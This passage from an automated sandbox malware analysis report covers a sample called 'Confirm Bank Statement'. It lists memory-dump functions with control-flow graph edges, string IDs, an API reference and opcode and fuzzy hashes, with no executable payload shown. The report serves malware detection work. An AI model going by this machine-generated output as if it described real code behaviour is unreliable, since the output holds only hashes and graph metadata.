                                                                                              • Instruction Fuzzy Hash: C071A235F002189BDB15DBB5D8507AE7BB2AFC4700F148129E406E7395DF349D46C795
                                                                                              Function 0287613F Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2100 287613f-2876162 2101 2876164-2876168 2100->2101 2102 2876178-2876183 2100->2102 2105 2876190-2876197 2101->2105 2106 287616a-2876176 2101->2106 2103 287622b-2876257 2102->2103 2104 2876189-287618b 2102->2104 2113 287625e-28762b6 2103->2113 2107 2876223-2876228 2104->2107 2108 28761b7-28761c0 2105->2108 2109 2876199-28761a0 2105->2109 2106->2102 2106->2105 2208 28761c2 call 287613f 2108->2208 2209 28761c2 call 28762a8 2108->2209 2109->2108 2110 28761a2-28761ad 2109->2110 2112 28761b3-28761b5 2110->2112 2110->2113 2112->2107 2133 28762c5-28762d6 call 2872a50 2113->2133 2134 28762b8-28762be 2113->2134 2114 28761c8-28761ca 2115 28761d2-28761da 2114->2115 2116 28761cc-28761d0 2114->2116 2120 28761dc-28761e1 2115->2120 2121 28761e9-28761eb 2115->2121 2116->2115 2119 28761ed-28761fe 2116->2119 2211 2876201 call 2876a17 2119->2211 2212 2876201 call 2876a20 2119->2212 2120->2121 2121->2107 2124 2876207-287620c 2125 2876221 2124->2125 2126 287620e-2876217 2124->2126 2125->2107 2213 2876219 call 28793d0 2126->2213 2214 2876219 call 28793cf 2126->2214 2215 2876219 call 287947d 2126->2215 2129 287621f 2129->2107 2137 28762dc-28762e0 2133->2137 2138 287636a-287636c 2133->2138 2134->2133 2139 28762e2-28762ee 2137->2139 2140 28762f0-28762fd 2137->2140 2205 287636e call 2876461 2138->2205 2206 287636e call 287613f 2138->2206 2207 287636e call 28762a8 2138->2207 2146 28762ff-2876309 2139->2146 2140->2146 2141 2876374-287637a 2144 2876386-287638d 2141->2144 2145 287637c-2876382 2141->2145 2147 2876384 2145->2147 2148 28763e8-2876447 2145->2148 2151 2876336-287633a 2146->2151 2152 287630b-287631a 2146->2152 2147->2144 2161 287644e-287647e 2148->2161 2153 2876346-287634a 2151->2153 2154 287633c-2876342 2151->2154 2163 287631c-2876323 2152->2163 2164 287632a-2876334 2152->2164 2153->2144 2158 287634c-2876350 2153->2158 2156 2876344 2154->2156 2157 2876390-28763e1 2154->2157 2156->2144 2157->2148 2160 2876356-2876368 2158->2160 2158->2161 2160->2144 2176 28764a3-28764b0 2161->2176 2177 2876480-287648d 2161->2177 2163->2164 2164->2151 2183 28764b2-28764bc 2176->2183 2185 287649f-28764a1 2177->2185 2186 287648f-287649d 2177->2186 2191 28764e4-28764e6 call 28765ff 2183->2191 2192 28764be-28764cc 2183->2192 2185->2183 2186->2183 2195 28764ec-28764f0 2191->2195 2198 28764ce-28764d2 2192->2198 2199 28764d9-28764e2 2192->2199 2196 28764f2-2876507 2195->2196 2197 2876509-287650d 2195->2197 2201 287652b-2876531 2196->2201 2200 287650f-2876524 2197->2200 2197->2201 2198->2199 2199->2191 2200->2201 2205->2141 2206->2141 2207->2141 2208->2114 2209->2114 2211->2124 2212->2124 2213->2129 2214->2129 2215->2129
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq$Hq
                                                                                              • API String ID: 0-925789375
                                                                                              • Opcode ID: 1000652a4a295e0b1c71743520ccd00dfb6f7310bb0efcc801fc63da4fe4c4de
                                                                                              • Instruction ID: bb25af3e9779cd075cdf0a1d21f9b55afbf08c898d5cee9f6a4fe55062e8d1ed
                                                                                              • Opcode Fuzzy Hash: 1000652a4a295e0b1c71743520ccd00dfb6f7310bb0efcc801fc63da4fe4c4de
                                                                                              • Instruction Fuzzy Hash: 9C51E33D7046259FDB158F64D854BAE7BFAFF88304F094929E859CB291EB34C841CBA1
                                                                                              Function 00B5C76C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2421 b5c76c 2422 b5c82b-b5c83c 2421->2422 2423 b5c843-b5c84c 2422->2423 2424 b5c83e 2422->2424 2426 b5c623-b5c648 2423->2426 2427 b5c852-b5c865 2423->2427 2424->2423 2428 b5c64f-b5c686 2426->2428 2429 b5c64a 2426->2429 2430 b5c867 2427->2430 2431 b5c86c-b5c887 2427->2431 2439 b5c68d-b5c6bf 2428->2439 2440 b5c688 2428->2440 2429->2428 2430->2431 2432 b5c88e-b5c8a2 2431->2432 2433 b5c889 2431->2433 2437 b5c8a4 2432->2437 2438 b5c8a9-b5c8bf LdrInitializeThunk 2432->2438 2433->2432 2437->2438 2441 b5c8c1-b5c9bf 2438->2441 2446 b5c6c1-b5c6e6 2439->2446 2447 b5c723-b5c736 2439->2447 2440->2439 2444 b5c9c7-b5c9d1 2441->2444 2445 b5c9c1-b5c9c6 call b55ca8 2441->2445 2445->2444 2452 b5c6ed-b5c71b 2446->2452 2453 b5c6e8 2446->2453 2450 b5c73d-b5c762 2447->2450 2451 b5c738 2447->2451 2456 b5c764-b5c765 2450->2456 2457 b5c771-b5c7a9 2450->2457 2451->2450 2452->2447 2453->2452 2456->2427 2458 b5c7b0-b5c811 call b5c168 2457->2458 2459 b5c7ab 2457->2459 2465 b5c813 2458->2465 2466 b5c818-b5c82a 2458->2466 2459->2458 2465->2466 2466->2422
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 00B5C8AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6e715a1f30d6d2152546502f458e160dc3cd384fd4209c5c8a98b1579c540900
                                                                                              • Instruction ID: 6ee66b571af06da2e6f6f02a0e137f9ae4b9ded9e9245dc579a73d67169cd368
                                                                                              • Opcode Fuzzy Hash: 6e715a1f30d6d2152546502f458e160dc3cd384fd4209c5c8a98b1579c540900
                                                                                              • Instruction Fuzzy Hash: 64112974E002099FDB04DBA8D884BADBBF6FB88306F6481A5E944E7242D771AD45CB64
                                                                                              Function 028793D0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq
                                                                                              • API String ID: 0-1999159160
                                                                                              • Opcode ID: 452737f24d8649c1aa8ca0982a3683bb67e9cd1aca431f5546b6a00a6d457cdd
                                                                                              • Instruction ID: d329aead4898e5c78bc68b754f6d8fdfcdd71bbb9ea9b7d3fd891404a2db1f7b
                                                                                              • Opcode Fuzzy Hash: 452737f24d8649c1aa8ca0982a3683bb67e9cd1aca431f5546b6a00a6d457cdd
                                                                                              • Instruction Fuzzy Hash: 7D41B139B042149FCB149B64D854AAE7BF7BFC8711F148069E90ADB7A1CE35DC02CB95
                                                                                              Function 02875F08 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d8q
                                                                                              • API String ID: 0-2239850164
                                                                                              • Opcode ID: 83a255990e7be833653482c02231508da30e94d6da87be89d5e432e1d9633d6b
                                                                                              • Instruction ID: 71a7480c9a9410ba6830c8b792c8be0e52f985d8b198ec171f0ba9b958db7bd3
                                                                                              • Opcode Fuzzy Hash: 83a255990e7be833653482c02231508da30e94d6da87be89d5e432e1d9633d6b
                                                                                              • Instruction Fuzzy Hash: 0741E438704B048FD724AB39D854B2A7BE2AF84314F1945ADE85ACF7B1EB24EC06C745
                                                                                              Function 028782F8 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 2b6eb616e4a37285681c8f3d5f2e8522f7baa552add1c913d9974d244f72bee2
                                                                                              • Instruction ID: 827b56de55a4d665e493683be1a069b140dba20448eac2fd71042aee619434bd
                                                                                              • Opcode Fuzzy Hash: 2b6eb616e4a37285681c8f3d5f2e8522f7baa552add1c913d9974d244f72bee2
                                                                                              • Instruction Fuzzy Hash: 274128796041199FCB14DF28D848AAE7BB2BF48315F144069F91ACB3B0CB71DD41EBA1
                                                                                              Function 02878640 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 6610a74348e06865461d4993e9256ff622674aa2c1c04e7be3bf17a18a761e42
                                                                                              • Instruction ID: 6dd5f25a222bf9e0107cfd7e2446bb3a1e3b7c692d91cd488e214b17fc68f032
                                                                                              • Opcode Fuzzy Hash: 6610a74348e06865461d4993e9256ff622674aa2c1c04e7be3bf17a18a761e42
                                                                                              • Instruction Fuzzy Hash: 8521F43D70C1599FCB10DF26DC8CA7B7BEAFB85254B148426E916CB245DB71D840EB60
                                                                                              Function 02875EF8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d8q
                                                                                              • API String ID: 0-2239850164
                                                                                              • Opcode ID: bf6226d6a92bfd765cf1c67bb41c6b303377c655fc0401e425e0d2543e4b2cb4
                                                                                              • Instruction ID: f0bcd1d53070edfc804b6f5428860c6d46058e0bc277c09f7dca37066dfd3ab7
                                                                                              • Opcode Fuzzy Hash: bf6226d6a92bfd765cf1c67bb41c6b303377c655fc0401e425e0d2543e4b2cb4
                                                                                              • Instruction Fuzzy Hash: 16112C38700B414FD7319B39D444B5EBBE2AFC0214F088A5DD85ACB561DB64F80A8781
                                                                                              Function 02872808 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq
                                                                                              • API String ID: 0-1594803414
                                                                                              • Opcode ID: e8120ce3855f8cb1d0a623e19f94102f954dce283f2c2af12aace1715e87f2fe
                                                                                              • Instruction ID: d1e9f8e7d533950c7b83c5c4ec68441d15dfc1e9a87f593707b595aa4e6cf9b3
                                                                                              • Opcode Fuzzy Hash: e8120ce3855f8cb1d0a623e19f94102f954dce283f2c2af12aace1715e87f2fe
                                                                                              • Instruction Fuzzy Hash: BB11E136B042089FDF09AF7888515AE7BA3FFD8350B18845AE9099B365CE358906DB51
                                                                                              Function 028762A8 Relevance: .2, Instructions: 218COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2aa16f58ec20fca6dd537f293d43f7c97a33536496c43dddca4aeb4ac5e0e225
                                                                                              • Instruction ID: 5257c3eb43d367b80576b1e9ee11efc6b03abc1394e6f1a200c4ce921f9a9eef
                                                                                              • Opcode Fuzzy Hash: 2aa16f58ec20fca6dd537f293d43f7c97a33536496c43dddca4aeb4ac5e0e225
                                                                                              • Instruction Fuzzy Hash: 6A71D1387006258FDB199B79C89473EB7AABFC9314B188569D50ACB3A4EF30CC42C791
                                                                                              Function 028784F8 Relevance: .2, Instructions: 179COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c1ac95d17ffdcf1c31aa61dba48e7c433c2ecbfb9212feef140c10ea69e97a1
                                                                                              • Instruction ID: 50ebe647f01eb3137a9188cd6a2b9be981d9c1fd12ea9fd36b439719d719a3c9
                                                                                              • Opcode Fuzzy Hash: 9c1ac95d17ffdcf1c31aa61dba48e7c433c2ecbfb9212feef140c10ea69e97a1
                                                                                              • Instruction Fuzzy Hash: E9518F3D7041159FCB14DF39C89CA6A7BEABF8865470944AAE41ACB372EB31DC01EB50
                                                                                              Function 028744FF Relevance: .2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca7b0722f45f6bff39852defb2b58594920570c26f735fff1dd9fe7144295add
                                                                                              • Instruction ID: 2c759b64c7c743dedddc9a99a3912792a0563dd404375c9c2dd2bcec07306038
                                                                                              • Opcode Fuzzy Hash: ca7b0722f45f6bff39852defb2b58594920570c26f735fff1dd9fe7144295add
                                                                                              • Instruction Fuzzy Hash: 4D819C74E052289FDB65DF29D995BDDBBB2BB89300F1480EAD80DA7264DB315E81CF40
                                                                                              Function 028724F8 Relevance: .1, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d1634fb4a0881d4dc904d0c4b6270c9e566626a5d03f36ccc7d07c561936cbe9
                                                                                              • Instruction ID: 1faced6bb4064c15a94e128efb5a21028a5a1ab7adc0b42c61c552631c985484
                                                                                              • Opcode Fuzzy Hash: d1634fb4a0881d4dc904d0c4b6270c9e566626a5d03f36ccc7d07c561936cbe9
                                                                                              • Instruction Fuzzy Hash: D7414575E002199BDB15DFA5C890BEEBBF1AF84700F24812AE815B7255EB70ED46CB90
                                                                                              Function 02875867 Relevance: .1, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b61eef6c4b5d62149bcd27adc78e1a52955fc6372951ec25fc2d25316fd80aa3
                                                                                              • Instruction ID: e114424580c2a685825423bebd008938aee3398fb38fda69cbfbfd52ff811c64
                                                                                              • Opcode Fuzzy Hash: b61eef6c4b5d62149bcd27adc78e1a52955fc6372951ec25fc2d25316fd80aa3
                                                                                              • Instruction Fuzzy Hash: 0631A0396041499FCF059F64E854AAF7BB2FB88311F108425FD19CB290CB39CE62DBA1
                                                                                              Function 02878729 Relevance: .1, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52751cdec75449069b73e388dfe3dd9c50e88d1822cf2bc8a1afe7a044a6fc5d
                                                                                              • Instruction ID: cab672c8e6534b59438d90a3e054694a7fed68a092da7b3f3fa46b7e56980180
                                                                                              • Opcode Fuzzy Hash: 52751cdec75449069b73e388dfe3dd9c50e88d1822cf2bc8a1afe7a044a6fc5d
                                                                                              • Instruction Fuzzy Hash: 4021AF3D7042144FDB25573A98AC77E6A97AFC4799B248039D41ACB398EF75CC82E780
                                                                                              Function 00A7D030 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3718693176.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_a7d000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aee8cb4d5c688a448ab40af618b30926162abb2be99ba283447e6de48e857f90
                                                                                              • Instruction ID: fde1cbe6fc8569d5ef5bcc22619a08668cde98354ee6d1a8703309b7a8ab183b
                                                                                              • Opcode Fuzzy Hash: aee8cb4d5c688a448ab40af618b30926162abb2be99ba283447e6de48e857f90
                                                                                              • Instruction Fuzzy Hash: BD21BE75608244EFDB14DF14DD84B26BBB5FF84314F24C6A9E84E4A296C33AD847CA62
                                                                                              Function 028726EA Relevance: .1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e221e5960deba430fd9e59284fd86a6e2f1cb654fc5f81dad0d066cd2936478
                                                                                              • Instruction ID: 9931a61ac55ffe40ed43643f5d1343220a72fee86d0e2d711402b3c04010b3c8
                                                                                              • Opcode Fuzzy Hash: 2e221e5960deba430fd9e59284fd86a6e2f1cb654fc5f81dad0d066cd2936478
                                                                                              • Instruction Fuzzy Hash: 7F11C4327083845FDF0A5F7858207AE3FA3AFC9210B14446EE506DB396CE348D1697AA
                                                                                              Function 02876461 Relevance: .1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 81987c7f34192724a036a6cbf83b9737385d82029c97eac03901990b7f07c067
                                                                                              • Instruction ID: 27fe46fab3dc68feb53250ed881a3ff215b919694d9f4668c949280a79ccc0ba
                                                                                              • Opcode Fuzzy Hash: 81987c7f34192724a036a6cbf83b9737385d82029c97eac03901990b7f07c067
                                                                                              • Instruction Fuzzy Hash: 3611E339704A219FC7255B39D85492EB7A6FFC526531881B9E90ACB364EF20DC02C780
                                                                                              Function 028793CF Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c935514dc69942176ab60ea961d3fadae0bf8ebb1a92263cac43b65468a13e9b
                                                                                              • Instruction ID: 9ff896aa2676c8fe97930e73aea19ce63fe5a0177770860623c28a8e82f487a4
                                                                                              • Opcode Fuzzy Hash: c935514dc69942176ab60ea961d3fadae0bf8ebb1a92263cac43b65468a13e9b
                                                                                              • Instruction Fuzzy Hash: 21111C39B001089FCB149F65DC94ADDBBB6BB8C611F148169E916E7290DA719C50CB50
                                                                                              Function 02872270 Relevance: .1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: da130548e53e5df1cfa57434db874b8ede8f148af4aa2a7684bc9e0fa30f32a2
                                                                                              • Instruction ID: 0808a1efd6bf85c5cbdda9aa6f8eda3f269b695366a13e9dfcdd8ffb179fdfc2
                                                                                              • Opcode Fuzzy Hash: da130548e53e5df1cfa57434db874b8ede8f148af4aa2a7684bc9e0fa30f32a2
                                                                                              • Instruction Fuzzy Hash: B111567680034D9FDB20DF99C805BDEBBF4EB48320F148419EA18A7250C339A954DFA0
                                                                                              Function 02871EB9 Relevance: .1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cf14596f2cc2d5e6609e75a59a2f95774f704970b055716777510aa25e413019
                                                                                              • Instruction ID: 96bf60cec0d8536affca249234bff0c0410a1bb97df39784c655e2304afca2f5
                                                                                              • Opcode Fuzzy Hash: cf14596f2cc2d5e6609e75a59a2f95774f704970b055716777510aa25e413019
                                                                                              • Instruction Fuzzy Hash: AA11E839E402488FDB00DFB8D854BAEBBF5AF49315F418065E808E7749EB31DD428B54
                                                                                              Function 00A7D02B Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3718693176.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_a7d000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                              • Instruction ID: 9778b97507a1f92166572af6c632be8d1b530da17f93dfc30034385ed3078212
                                                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                              • Instruction Fuzzy Hash: 9A118E75504284DFCB15DF14D9C4B15BB71FB84314F28C6AAD84A4B656C33AD84BCB61
                                                                                              Function 0287863F Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f7702362948f8c8bf20c9b95bd1f706eda00078a580192da0c20312293ba447
                                                                                              • Instruction ID: 005b89b69c0669d03dd39fff7d0ef2de32006de340aaf6d9a7b4a2fdd20a4aaf
                                                                                              • Opcode Fuzzy Hash: 5f7702362948f8c8bf20c9b95bd1f706eda00078a580192da0c20312293ba447
                                                                                              • Instruction Fuzzy Hash: 8701B57DB081595B8B14CE699C8C9BFBBEAFBC5154719812AE41AC7115DB31C810EB60
                                                                                              Function 02872990 Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 38260c905510119f2ed435cc45f35ef91192695cb4f39b5f4d20be2e4ce5b7ea
                                                                                              • Instruction ID: 0e0285bf6f76fbf3e0929eb59ffa7d496828fae10dd729a707be6b7ae7d6e016
                                                                                              • Opcode Fuzzy Hash: 38260c905510119f2ed435cc45f35ef91192695cb4f39b5f4d20be2e4ce5b7ea
                                                                                              • Instruction Fuzzy Hash: FE1167768002499FDF20CF99C845BDEBFF5EF48320F148419E918A7250C3399554DFA0
                                                                                              Function 028760A0 Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 132401a876a4da73d46dbef0a7dde5655dbb9e3305a07ecdfaa4b863a414a2e3
                                                                                              • Instruction ID: 97fd7a0869e52d8589d2d2ac4e37463dea339d9a415d505492109843c46fc13f
                                                                                              • Opcode Fuzzy Hash: 132401a876a4da73d46dbef0a7dde5655dbb9e3305a07ecdfaa4b863a414a2e3
                                                                                              • Instruction Fuzzy Hash: B701267BA081586FCF028F559C04EEF3FAAEBD5350F08802AF515C3192E675C906DB60
                                                                                              Function 028760B0 Relevance: .0, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 58e88b1f37cd2a086b1487c3ab3f43b6dc29e44dcb4d2c71bc8ecc30e2bb2826
                                                                                              • Instruction ID: 349b982296d0820a7c1014ed47b55d6a65895fce21724c7e721b96a32566542b
                                                                                              • Opcode Fuzzy Hash: 58e88b1f37cd2a086b1487c3ab3f43b6dc29e44dcb4d2c71bc8ecc30e2bb2826
                                                                                              • Instruction Fuzzy Hash: B201F93A7001286BCF059F599C00EEF3BABEBC97A0F148039F915D7281DA75CD159790
